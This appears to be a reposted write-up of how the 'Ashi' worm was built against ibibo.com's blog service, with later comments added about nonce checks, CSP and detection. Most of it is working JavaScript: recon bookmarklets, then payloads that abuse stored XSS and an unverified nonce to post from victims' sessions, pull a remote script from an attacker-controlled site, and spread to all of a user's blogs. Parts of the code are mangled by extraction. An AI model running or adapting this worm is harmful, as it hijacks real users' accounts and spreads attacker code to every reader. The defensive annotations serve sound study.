Ashi Virus was developed by "vinnu" bhai last year. It was a perfect example of a self-propagating virus. Let me post his original paper here. It will give us a better view of how such worms/viruses are made and also of their capabilities.
Vulnerability:- I found several XSS vulnerabilities in ibibo.com. Next, I looked for a good entry point from which the exploitation could be automated. I found two PHP pages, post.php and new-post.php, which can submit my blog posts, and both the title and the content were prone to XSS. So I developed a script to find out the form elements:
// Recon bookmarklet: walks the first <form> on the page and builds a
// "name=value&name=value..." string from its fields, shown via alert().
// The later payload (blog()) reproduces exactly these field names, so a
// server-side defence has to treat every field of this form as
// attacker-controllable, not just the visibly editable ones.
javascript:var vin=document.getElementsByTagName("form")[0];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);
The above script retrieves the form elements and their values. So now I had the script (you have to alter the above script a little, increasing the form index to a suitable value to reach the target form), as:
// Same field-dumping bookmarklet as above, with the form index raised to 2
// (the form the author was after, per the prose above). Output is the
// "name=value&..." string reproduced in the dialog shown below.
javascript:var vin=document.getElementsByTagName("form")[2];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);
Paste the above script into the browser's address bar once the page "http://blogs.ibibo.com/<your-blog>/wp-admin/" has opened. I wrote "Namaste" in the title and "Hows the life there" in the content box. It gave me the following in a dialogue
box:
post_title=Namaste&content=Hows the life there&tags_input=&action=post-quickpress-save&quickpress_post_ID=0
&_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/&save=Save Draft&=Cancel&publish=Publish
It seems they are checking the referer (_wp_http_referer) and a nonce [_wpnonce] (though the nonce was the same every time I tried to post). Still, the nonce appears on a page which cannot be directly XSSed, so I just tried to post the request without the referer and nonce.
// First proof-of-concept. blog() POSTs to post.php with a title and content
// that carry an HTML fragment (nunnu) loading a script from a remote host,
// and with _wpnonce and _wp_http_referer deliberately left empty. The author
// reports below that the server accepted the post anyway, i.e. the nonce was
// not verified server-side. That missing check is the CSRF weakness which
// lets a script running in a logged-in reader's session publish on their
// behalf; the stored XSS in title/content is what makes the fragment execute.
// NOTE: this listing is mangled by extraction (tokens split across lines and
// stray spaces inside identifiers); it is kept as found.
javascript:blog(); function blog(){var nunnu="><scr"+"ipt language=javascript"+"src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";quote="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";varblpayload="post_title="+quote;alert (nunnu);blpayload+=encodeURIComponent(nunnu);bl
payload+="&content=Jaijeya";blpayload+=encodeURICo mponent(nunnu);blpayload+="hor&t
ags_input=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish";alert(blpayload) ;ajaxPSLV("http://blogs.ibibo.co
m/vulnerable/wp-admin/post.php",blpayload);}function ajaxPSLV(url, payload)
// ajaxPSLV: generic asynchronous POST helper (XMLHttpRequest, with an
// ActiveX fallback for old IE). The request is same-origin, so the reader's
// session cookies are attached by the browser — no credential appears in
// the payload. The alert() calls are the author's debugging output.
{ alert("url:\t"+url+"\npayload:\n"+payload);var xmlhttp; if
(window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest(); }else if
(window.ActiveXObject) {try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}
catch (e) { try {xmlhttp = new
ActiveXObject("Msxml2.XMLHTTP");} catch (e) { return;}
} } alert("sending");xmlhttp.open("POST", url,
true);xmlhttp.setRequestHeader("Content-Type", "application/x-www-formurlencoded");
xmlhttp.setRequestHeader("Content-length",
payload.length);alert("sending:\t"+payload.length) ;xmlhttp.send(payload);alert("se
nt");}alert("done");
It worked: the post was published even without the nonce and referer defined in the query string. But there is a problem.
The script was appearing in the heading, and I also wanted it to post a different topic every time it executed, so I introduced the following well-known construct for choosing one string out of a list:
// Picks one of ten fixed strings at random and uses it as the post title,
// so that each injected post reads differently. The title is only the
// varying prefix of the payload; the injected HTML fragment appended to it
// (see the assembled code below) is constant, so detection of this kind of
// content is better keyed on that fragment than on the title text.
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
// Start of the form-encoded body: the chosen quote becomes post_title.
var blpayload="post_title="+quote[no];
After assembling it with the above script, I got the following code:
// Second iteration of the proof-of-concept; the target URL is still
// hard-coded (the trigger() version further down removes that). Two separate
// weaknesses are combined: stored XSS (title/content are rendered without
// output encoding, so the fragment executes for every reader) and an
// unverified nonce (the POST succeeds with _wpnonce and _wp_http_referer
// empty). Verifying the nonce server-side breaks the POST as written;
// contextual output encoding of title/content, plus a CSP that disallows
// external script sources and inline event handlers, removes the execution
// path itself.
javascript:blog();
// Builds the form-encoded body and sends it. nunnu is the HTML fragment
// injected twice (title and content): a <script src=...> pointing at the
// remote ibibo.js plus an <a onmouseover=...> inline handler.
function blog(){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
// Random title prefix (one of ten fixed strings) so that each post differs.
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
// Fields mirror the quick-press form captured in the dialog output above;
// nonce and referer are sent empty. The "</p></div" in the content closes
// the enclosing markup of the rendered post before the fragment.
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent(nunnu);
blpayload+="hor&tags_input=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wpadmin/
post.php",blpayload);
} function ajaxPSLV(url, payload) {
// Generic asynchronous POST helper (XMLHttpRequest, ActiveX fallback for
// old IE). The request is same-origin, so the reader's session cookies are
// attached by the browser — which is why no credential appears in the
// payload. The alert() calls are the author's debugging output; a detection
// rule should not depend on visible UI side effects like these.
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
}alert("done");
But I don't want my worm to post only to a hard-coded blog. It must find all the blogs of the user and inject posts into them as above. To do this I have to check the hrefs of all the anchors, because the blog names appear within the page and clicking any one of them switches to the respective blog.
// Recon bookmarklet: lists the href of every anchor on the page, one per
// line, via alert(). Used to discover which links lead to the user's blogs;
// the "wp-admin" filter that separates them from other links comes next.
javascript:var vin=document.getElementsByTagName("a");var nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);
But there are also several other items along with the blogs, so my virus must distinguish the blogs from the other objects.
I checked the pattern. After careful inspection, I found that the anchors whose href contains wp-admin are the references to the user's blogs. So I developed another script to check it:
// Target-discovery check. test() selects every anchor whose href contains
// "wp-admin", truncates the href just after that segment and appends
// "/post.php", then shows the count and the list. Each hit is a blog the
// current user can post to — this is the enumeration step that turns a
// single-blog post into propagation across all of the user's blogs.
javascript:test();
function test() {
var list="";
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
var intex=0;
for(var iter=0;iter<vin.length;iter++){
// index is assigned inside the condition; index+8 is the length of "wp-admin".
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
list += address+"\n";intex++;
}}alert(intex+"\n"+list);}
Now I had a way to identify the blogs among the other objects and to post random topics. By combining all of these, a beast started to take shape:
// Entry point of the assembled script: runs trigger(), defined below.
javascript:trigger();
// Same anchor discovery as test(), but instead of listing the results it
// calls blog() on each derived post.php endpoint — one POST per blog the
// logged-in user administers. For detection: a single session issuing
// several POSTs to .../wp-admin/post.php within moments, each carrying the
// same external script reference in its body, is the network-visible shape
// of this step.
function trigger() {
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
blog(address);
}}}
// Builds the form-encoded body for one blog and sends it to addr (a
// .../wp-admin/post.php URL from trigger()). nunnu is the injected HTML
// fragment: a <script src=...> loading the remote ibibo.js plus an
// <a onmouseover=javascript:blog();> inline handler (the blog referenced by
// that handler is presumably defined by the remote file in the reader's
// page — cannot be confirmed from this listing). Nonce and referer are
// sent empty; the author states the server accepted such posts.
function blog(addr){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
// Random title prefix (one of ten fixed strings) so that each post differs.
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
// Title carries the fragment; content closes the enclosing markup
// ("</p></div") before its own copy.
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
// Second copy of the fragment, wrapped in an inline <script> that passes it
// through eval(). A CSP that omits 'unsafe-eval' and disallows inline script
// blocks this stage regardless of any content filtering.
blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
blpayload+="hor&tags_input=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV(addr,blpayload);
}
// Generic asynchronous POST helper: XMLHttpRequest, with an ActiveX fallback
// for old IE, and a silent return when neither is available. The request is
// same-origin, so the reader's session cookies are attached by the browser —
// no credential appears in the payload, which is why server-side nonce
// verification (not cookie presence) is the relevant control. The alert()
// calls are the author's debugging output; detection should not rely on
// visible UI side effects like these.
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
// Content-length is set by hand here; browsers compute it themselves.
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
};
But I thought the title was not a good place to inject the code, as it would appear in the dashboard. So I placed the code in the post.php argument named "content" instead of "post_title". The variable "nunnu" contains the code for a script which retrieves the remote JavaScript file at:
http://sites.google.com/site/urcontrolledsite/ibibo.js
This article was originally published in blog: